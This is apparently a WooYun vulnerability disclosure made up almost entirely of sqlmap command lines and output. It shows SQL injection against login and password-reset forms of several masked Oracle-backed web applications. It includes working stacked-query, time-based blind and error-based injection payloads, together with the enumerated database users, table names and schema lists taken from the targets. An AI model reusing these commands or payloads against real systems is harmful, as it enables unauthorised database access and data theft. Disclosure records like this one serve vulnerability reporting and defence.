WooYun.org

sqlmap -u "http://**.**.**.**/ascm/index.jsp" --data "User=aaa&Password=sssssssssss&imageField.x=24&imageField.y=13"

Parameter: User (POST)
    Type: stacked queries
    Title: Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)
    Payload: User=aaa');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(86)||CHR(76)||CHR(108),5) FROM DUAL--&Password=sssssssssss&imageField.x=24&imageField.y=13
the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

current user:    'BIS4'
available databases [1]:
[*] BIS4

sqlmap -u "http://**.**.**.**/QMDRP/ResetPassword" --data "j_username=aa&old_password=11111111&new_password=ssssssss&fix_password=ssssssss&current_client=800&isDrp=true"

Parameter: current_client (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: j_username=aa&old_password=11111111&new_password=ssssssss&fix_password=ssssssss&current_client=800' AND 3938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(82)||CHR(74)||CHR(80),5) AND 'FxEl'='FxEl&isDrp=true
Current database
[14 tables]
+-----------------------+
| COURSE                |
| FOUNDTHUMBS           |
| LINEITEM              |
| ROLE                  |
| BINN_CT_TEMPL_ELEMS   |
| CDB_BUDDYS            |
| CONNEXION             |
| ETUDIANTS             |
| MULTASTRATEGY         |
| NUKE_BBFORUM_PRUNE    |
| NUKE_GALLERY_COMMENTS |
| OC                    |
| SAMEDICINO_GE         |
| SETTING               |
+-----------------------+

sqlmap -u "**.**.**.**:9010/SYSMainSF/Login" --data "UserCode=aa&PassWord=ss&token_key=&UserIp=&SessionID=&__QMWindowCode=c7c1f6a3-7c7f-986e-9545-f280880cef65&LoginState=UpdatePassWord&NewPassWord=ss&__IsAjaxRequest=True" --dbs

Parameter: UserCode (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: UserCode=aa') AND 2628=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2628=2628) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(120)||CHR(106)||CHR(113)) AND ('KRCq'='KRCq&PassWord=ss&token_key=&UserIp=&SessionID=&__QMWindowCode=c7c1f6a3-7c7f-986e-9545-f280880cef65&LoginState=UpdatePassWord&NewPassWord=ss&__IsAjaxRequest=True
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: UserCode=aa') AND 4665=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('kDPD'='kDPD&PassWord=ss&token_key=&UserIp=&SessionID=&__QMWindowCode=c7c1f6a3-7c7f-986e-9545-f280880cef65&LoginState=UpdatePassWord&NewPassWord=ss&__IsAjaxRequest=True
the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle

current user:    'TDSV2_JF'
available databases [15]:
[*] APPQOSSYS
[*] DBSNMP
[*] DSG
[*] JFSCM_TDS2SCM_WMS
[*] JINSHUI
[*] OUTLN
[*] SQLTXPLAIN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TDS2DMS
[*] TDS_P2P
[*] TDSV2_JF
[*] WMSYS
[*] XDB